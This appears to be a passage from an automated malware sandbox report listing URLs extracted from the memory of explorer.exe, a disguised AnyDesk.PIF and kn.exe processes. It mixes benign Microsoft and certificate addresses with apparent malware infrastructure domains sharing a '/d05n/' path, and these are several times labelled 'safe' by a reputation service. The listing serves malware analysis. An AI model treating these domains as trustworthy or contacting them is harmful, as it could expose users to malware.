https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.rnuah.xyz/d05n/ | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.askabirokulmumkun.online/d05n/www.ultangaziescortbayanlari.online | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.trl-migrate.online/d05n/www.9838.xyz | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://enterpriseregistration.windows.net/EnrollmentServer/key/ | kn.exe | false | | high
http://www.9838.xyz/d05n/www.xc31.top | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.evelupcasino.club/d05n/ | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.trl-migrate.online/d05n/ | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ursing-caregiver-jobs-za-3.bond/d05n/ | explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yzsports200.xyz/d05n/www.evelupcasino.club | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.c | explorer.exe, 00000012.00000000.1548457580.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009237000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSd | explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.trl-migrate.online | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.826mza.top | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebsiteclients.online/d05n/www.rnuah.xyz | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.estspacefox.shopReferer: | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ybzert.online | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.trl-migrate.onlineReferer: | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.826mza.top/d05n/www.ursing-caregiver-jobs-za-3.bond | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com | explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.9838.xyz | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ustavoglins.store/d05n/ | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.evelupcasino.clubReferer: | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.9838.xyz/d05n/ | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ustavoglins.storeReferer: | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin | explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ustavoglins.store | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pmail.com | AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535026723.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1578294915.000000007FA8F000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446334242.0000000002A92000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ursing-caregiver-jobs-za-3.bond | explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp | false
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://ocsp.sectigo.com0CAnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.826mza.top/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.evelupcasino.clubexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.ultangaziescortbayanlari.online/d05n/www.yzsports200.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.ybzert.online/d05n/www.trl-migrate.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
                                                                                                  high
                                                                                                  https://aquadream.rs/244_IpkokioahlpxAnyDesk.PIF, 0000000A.00000002.1533987559.0000000000965000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://ocsp.sectigo.com0AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.atingdilse.siteReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ybzert.onlineReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.yzsports200.xyz/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.atingdilse.site/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.estspacefox.shopexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
